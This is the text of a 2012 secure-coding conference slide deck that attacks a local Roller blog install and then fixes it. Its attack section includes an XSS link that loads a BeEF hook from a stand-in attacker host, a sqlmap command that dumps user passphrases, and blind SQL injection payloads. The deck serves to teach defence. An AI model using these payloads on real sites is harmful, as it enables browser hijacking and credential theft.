Java EE Web Security By Example: Frank Kim

Java EE Web Security By Example

JAX 2012

Java EE Web Security By Example 2

About

•  Frank Kim – Consultant, ThinkSec – Author, SANS Secure Coding in Java/JEE – SANS Application Security Curriculum Lead

Java EE Web Security By Example 3

What You Should Know

• Hacking is not hard • Don’t trust any data

– Assume that your users are evil!

Java EE Web Security By Example 4

Outline

•  Web App Attack Refresher – XSS, CSRF, SQL Injection

•  Testing – Hacking an open source app

•  Secure Coding – Fixing security bugs

Java EE Web Security By Example 5

Cross-Site Scripting (XSS)

• Occurs when unvalidated data is displayed back to the browser

• Types of XSS – Stored – Reflected – Document Object Model (DOM) based

Java EE Web Security By Example 6

Cross-Site Request Forgery (CSRF)

Java EE Web Security By Example 7

SQL Injection (SQLi)

•  Occurs when dynamic SQL queries are used – By injecting arbitrary SQL commands, attackers

can extend the meaning of the original query – Can potentially execute any SQL statement on

the database

•  Very powerful – #1 on CWE/SANS Top 25 Most Dangerous

Software Errors – #1 on OWASP Top 10

Java EE Web Security By Example 8

Outline

•  Web App Attack Refresher – XSS, CSRF, SQL Injection

•  Testing – Hacking an open source app

•  Secure Coding – Fixing security bugs

Java EE Web Security By Example 9

What are We Testing?

•  Installation of Roller 3.0 •  Fake install of SANS AppSec Street Fighter Blog •  Want to simulate the actions that a real attacker

might take –  There are definitely other avenues of attack –  We're walking through one attack scenario

Java EE Web Security By Example 10

Attack Scenario

1)  XSS to control the victim's browser 2)  Combine XSS and CSRF to conduct a

privilege escalation attack - Use escalated privileges to access another feature

3)  Use SQL Injection to access the database directly

Java EE Web Security By Example 11

Spot the Vuln - XSS

Java EE Web Security By Example 12

XSS in head.jsp

Java EE Web Security By Example 13

Testing the "look" Param

•  Admin pages include head.jsp •  The param is persistent for the session

Java EE Web Security By Example 14

XSS Exploitation

•  Introducing BeEF – Browser Exploitation Framework – http://www.bindshell.net/tools/beef

•  Uses XSS to hook the victim's browser – Log user keystrokes, view browsing history,

execute JavaScript, etc – Advanced attacks - Metasploit integration,

browser exploits, etc

Java EE Web Security By Example 15

XSS Exploitation Overview

Attacker Victim

1) Sends link with evil BeEF script

http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>

2) Victim clicks evil link

3) Victim's browser sends data to attacker

BeEF XSS Demo

Java EE Web Security By Example 17

Spot the Vuln - CSRF

Java EE Web Security By Example 18

CSRF in UserAdmin.jsp

Want to use CSRF to change

this field

CSRF Demo

Java EE Web Security By Example 20

Spot the Vuln – SQL Injection

Java EE Web Security By Example 21

SQL Injection in UserServlet

Java EE Web Security By Example 22

SQL Injection Testing

• UserServlet is vulnerable to SQLi http://localhost:8080/roller/roller-ui/authoring/user

No results

Java EE Web Security By Example 23

Exploiting SQL Injection

•  Introducing sqlmap –  http://sqlmap.sourceforge.net

•  Tool that automates detection and exploitation of SQL Injection vulns –  Supports MySQL, Oracle, PostgreSQL, MS SQL Server –  Supports blind, inband, and batch queries –  Fingerprint/enumeration - dump db schemas, tables/

column names, data, db users, etc –  Takeover features - read/upload files, exec arbitrary

commands, exec Metasploit shellcode, etc

Java EE Web Security By Example 24

sqlmap Syntax

� Dump userids and passwords python sqlmap.py -u "http://localhost:8080/roller/roller-ui/

authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

SQL Injection Demo

Java EE Web Security By Example 26

How it Works

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Java EE Web Security By Example 27

Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal

Java EE Web Security By Example 28

Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);

returns i select MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);

returns l select MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);

returns o

Java EE Web Security By Example 29

Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));

returns 105 select ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));

returns 108 select ORD(MID((SELECT IFNULL(CAST(passphrase AS

CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));

returns 111

Java EE Web Security By Example 30

Attack Summary

1)  XSS to control the victim's browser 2)  Combine XSS and CSRF to conduct a

privilege escalation attack - Use escalated privileges to access another feature

3)  Use SQL Injection to access the database directly

Java EE Web Security By Example 31

Outline

•  Web App Attack Refresher – XSS, CSRF, SQL Injection

•  Testing – Hacking an open source app

•  Secure Coding – Fixing security bugs

Java EE Web Security By Example 32

Application

Should I be consuming this?

Should I be emitting this?

Data Validation

Inbound Data

Outbound Data

Data Store

Validation

Encoding

Encoding

Validation

Outbound Data

Inbound Data

Validation

Java EE Web Security By Example 33

Output Encoding

•  Encoding –  Convert characters so they are treated as data

and not special characters

•  Must escape differently depending where data is displayed on the page

•  XSS Prevention Cheat Sheet http://www.owasp.org/index.php/

XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Java EE Web Security By Example 34

Fix XSS in head.jsp

• Add URL encoding <link rel="stylesheet" type="text/css"

media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

Java EE Web Security By Example 35

Fix CSRF in Update User Functionality

• UserAdmin.jsp – Add anti-CSRF token

<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >

• UserAdminAction.java – Check anti-CSRF token

if (!CSRFTokenUtil.isValid(req.getSession(false), req)){

return mapping.findForward("error");

}

Java EE Web Security By Example 36

Fix SQL Injection in UserServlet.java

• Use parameterized queries correctly if (startsWith == null || startsWith.equals("")) {

query = "SELECT username, emailaddress FROM rolleruser";

stmt = con.prepareStatement(query); } else {

query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";

stmt = con.prepareStatement(query); stmt.setString(1, startsWith + "%"); stmt.setString(2, startsWith + "%"); }

rs = stmt.executeQuery();

Java EE Web Security By Example 37

Building Secure Software

Source: Microsoft SDL

Java EE Web Security By Example 38

Remember

• Hacking is not hard • Don’t trust any data

–  Validate input –  Encode output –  Use CSRF tokens –  Use parameterized queries

Java EE Web Security By Example 40

Thanks!

Frank Kim [email protected] @sansappsec